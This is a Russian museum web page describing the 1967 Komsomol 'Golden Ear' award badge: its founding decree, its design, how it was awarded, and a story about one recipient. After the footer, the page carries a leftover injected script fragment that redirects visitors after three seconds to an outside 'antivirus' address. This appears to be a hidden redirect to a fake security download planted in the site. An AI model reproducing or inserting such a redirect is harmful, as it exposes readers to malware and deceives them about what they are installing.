Почетный знак ВЛКСМ
 
 

Экспозиция

Знаки и значки ЦК ВЛКСМ:

18. Знак ЦК ВЛКСМ «Золотой колос» (1967г.):

Золотой колос

  Бюро ЦК ВЛКСМ в 1967 г. утвердило знак "Золотой колос". В постановлении об этом сказано: "В целях поощрения молодых колхозников, рабочих совхозов, машинно- и лугомелиоративных станций, отделений и объединений "Сельхозтехники", строителей водохозяйственных объектов, рабочих заводов сельскохозяйственного машиностроения, ученых сельско­хозяйственных учебных и научно-исследовательских учреждений, специалистов сельского хозяйства, отличившихся в выполнении производственных заданий, показавших пример творческого отношения к труду, а также представителей сельской интеллигенции и старших поколений крестьянства, выполнявших большую работу по воспитанию достойной смены хлеборобов, молодых рабочих промышленных предприятий и учреждений, студентов и учащихся учебных заведений, оказывавших постоянную шефскую помощь селу, учредить наградный знак ЦК ВЛКСМ "Золотой колос".
Первые изготовленные знаки "Золотой колос" имели пластмассовую колодочку и по размерам были меньших габаритов, чем их последующий выпуск с муаровой лентой. Изготовлялись они из тяжелого металла и имели булавочное крепление. Выдавались они с удостоверением установленного образца.
Последующие знаки выполнены в виде деформированного с боков круга, обрамленного рельефными ветвями стального цвета. Вырезы по внешней кромке круга придают основе знака форму шестеренки, символизирующей основную деталь сельскохозяйственных механизмов. На овал внутренней части круга, покрытой белой и темно-красной эмалью, наложен колос пшеницы, выполненный из металла под цвет золота. Внизу основы знака — лента с надписью: "ЦК ВЛКСМ". Знак с помощью переходного кольца крепится к пятиугольной колодочке, покрытой зеленой муаровой лентой.
Награждение знаком "Золотой колос" производилось постановлением ЦК ВЛКСМ, а также постановлениями обкомов, крайкомов комсомола, ЦК ЛКСМ союзных республик от имени ЦК ВЛКСМ.

Один из первых кавалеров знака ЦК ВЛКСМ "Золотой колос" — Петр Егорович Дьяков, "огненный тракторист", как его называли. 8 июля 1974 г. в газете "Сельская жизнь" были опубликованы фотография, где П.Е. Дьяков запечатлен среди десятиклассников Ембаевской средней школы Тюменской области, и короткая заметка. В трудном 1929 г. вместе с беднотой деревни Усть-Ламейки П. Дьяков создал коммуну "Новый путь". Кулаки решили жестоко расправиться с трактористом, его облили керосином и подожгли. Но по стечению случайных обстоятельств молодой тракторист остался жив. Тогда и родилась известная песня "Прокати нас, Петруша, на тракторе...". Большой, кипучей была жизнь Петра Дьякова. Вместе с комсомольцами 30-х годов он участвовал в строительстве Магнитки. В годы войны сражался с фашистами. В 1967 г. за успехи в сельском хозяйстве награжден орденом Ленина. (В. Лобусов, Ю. Лавриненко. «Награды ЦК ВЛКСМ»).

 


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>